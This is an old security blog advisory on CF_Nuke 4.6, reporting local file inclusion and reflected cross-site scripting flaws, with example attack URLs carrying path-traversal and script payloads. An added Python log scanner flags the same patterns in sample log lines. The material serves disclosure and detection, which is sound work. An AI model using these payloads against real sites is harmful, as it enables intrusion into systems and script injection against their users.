by r0t, der4444, cembo, VietMafia

Tuesday, December 06, 2005

CF_Nuke v4.6 Multiple vuln.

Vuln. discovered by: r0t
Date: 6 Dec. 2005
Vendor: http://www.mycfnuke.com/
Affected version: v4.6 and prior

Product Description:

CF_Nuke is a free, easy-to-setup and easy-to-use open source ColdFusion community-style web application. Offering greater control over web site maintenance and increased performance over previous versions, CF_Nuke 4.6 is coming into its own as a stand-alone web portal similar to phpNuke.
Core Features - Links, News and Reviews, Favorite Quotations - Private Message System for Members - Downloads - Themes - Recommend to Friend - Site FAQ System - Keyword and Category search - Member Registration - Users can submit News, Reviews, Quotations & Links for approval - extensive Admin capabilities. Additional Modules (Forums, Photo Gallery, Shoutbox, RSS, Calendar, Who's Online, Newsletters, etc.) are being made available by our awesome members.

Vuln. Description:

1) Input passed to the "sector" and "page" parameters in "index.cfm" isn't properly sanitised before being used to include ".cfm" files. This can be exploited to include arbitrary ".cfm" files that are accessible on the server.

Successful exploitation requires that "Sandbox Security" is not enabled for the directory.

2) Input passed to the "cat", "topic", and "newsid" parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Successful exploitation requires that "Global Script Protection" is disabled.

Examples:
/index.cfm?sector=../local file

/index.cfm?sector=quotes&page=../local file

/index.cfm?sector=news&page=topic&topic=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?sector=links&page=links&cmd=view&cat=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?sector=news&page=read&newsid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
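As an added example (not part of the original advisory), a small Python log scanner that applies the two findings above to access-log request lines for index.cfm: the include parameters "sector" and "page" must be a bare template name, and the reflected parameters "cat", "topic" and "newsid" must not carry markup. The log lines, IP addresses and payloads are constructed, and the whitelist pattern and rule names are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# index.cfm builds the cfinclude path from these; only a bare template name is legitimate.
INCLUDE_PARAMS = ("sector", "page")
INCLUDE_OK = re.compile(r"^[A-Za-z0-9_-]+$")  # assumed whitelist for template names
# index.cfm echoes these back into the page; markup characters do not belong in them.
REFLECTED_PARAMS = ("cat", "topic", "newsid")
MARKUP = re.compile(r"[<>]|javascript:", re.IGNORECASE)
# Apache-style access log: only the request line is needed.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')

def classify(request_path):
    """Return (parameter, reason) findings for one request path, after percent-decoding."""
    parts = urlsplit(request_path)
    if not parts.path.lower().endswith("/index.cfm"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %2F, %3C, ...
    findings = []
    for name in INCLUDE_PARAMS:
        for value in params.get(name, []):
            if not INCLUDE_OK.match(value):
                findings.append((name, "include param outside whitelist"))
    for name in REFLECTED_PARAMS:
        for value in params.get(name, []):
            if MARKUP.search(value):
                findings.append((name, "markup in reflected param"))
    return findings

def scan_log(lines):
    """Yield (line_number, findings) for each log line that trips a rule."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = classify(match.group(1))
            if findings:
                yield number, findings

# Constructed sample log lines, not from any real server; lines 1-2 are benign traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Dec/2005:20:21:00 +0200] "GET /index.cfm?sector=news&page=read&newsid=42 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [06/Dec/2005:20:21:04 +0200] "GET /index.cfm?sector=quotes&page=quotes HTTP/1.1" 200 4096',
    '198.51.100.9 - - [06/Dec/2005:20:22:10 +0200] "GET /index.cfm?sector=..%2F..%2Fother HTTP/1.1" 200 812',
    '198.51.100.9 - - [06/Dec/2005:20:22:15 +0200] "GET /index.cfm?sector=quotes&page=..%2Fother HTTP/1.1" 200 812',
    '198.51.100.9 - - [06/Dec/2005:20:23:01 +0200] "GET /index.cfm?sector=news&page=topic&topic=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3900',
    '198.51.100.9 - - [06/Dec/2005:20:23:07 +0200] "GET /index.cfm?sector=links&page=links&cmd=view&cat=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3900',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```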

Solution:
Look for a more secure alternative. :)

2 Comments:

Anonymous told...

yeah, cool, so many vulnerabilities, it's already starting to look like some sec site.. it's just that a lamer who doesn't know how to use vulnerabilities has nothing to do here... :(

8:21 PM

r0t told...

Sooner or later time will be found, if not by me then by one of my mates, to write in Latvian about exploiting vulnerabilities; though I think there is already something in Latvian to be found on netsec.lv, and in general the net is full of articles on how to.. use SQL or XSS, which are the favorites* on this blog.

Nobody can guess what you want; we can't put live examples here, because right at the very start of the blog there were already problems with the hoster over private info and live examples.

8:35 PM

Copyright (c) 2006 Pridels Sec Crew